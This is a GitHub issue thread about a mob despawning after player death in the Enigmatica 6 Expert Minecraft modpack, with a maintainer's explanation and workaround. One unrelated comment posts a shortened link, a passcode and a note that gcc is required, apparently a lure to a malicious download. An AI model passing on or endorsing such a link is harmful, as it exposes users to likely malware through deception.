### ISSUE TITLE
Masticator despawns after I die (Enigmatica 6 Expert)

### ISSUE THREAD

**Issue by milesman34** [EnigmaticaModpacks/Enigmatica6#5466]
### Modpack Version

E6E 1.9.0

### Describe your issue.

When I tried summoning the Masticator and bottling it, it killed me, then despawned afterwards. I had to cheat in a spawn egg and after several tries was able to properly progress in the pack. It shouldn't despawn afterwards, as it is far too punishing otherwise if you aren't willing to use cheats. 

### Have you modified the modpack?

No

### Did the issue happen in singleplayer or on a server?

Singleplayer

### Discord Username

milesman34

**Comment by MuteTiefling** [comment]
Understandable frustration, however this is how hostile mobs work in Minecraft; if no player is near them they despawn. 

A workaround for this would be to summon it nearer to your bed so that if you die and respawn, you're still in the area. This, of course, means you need sufficient Aura generation near your bed to handle the spawning.

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by milesman34** [comment]
> Understandable frustration, however this is how hostile mobs work in Minecraft; if no player is near them they despawn.
> 
> A workaround for this would be to summon it nearer to your bed so that if you die and respawn, you're still in the area. This, of course, means you need sufficient Aura generation near your bed to handle the spawning.

It was in my base, but I guess the issue really isn't fixable, though in retrospect I could have used a name tag, I didn't expect it to be that difficult to bottle and wasn't prepared to deal with that.
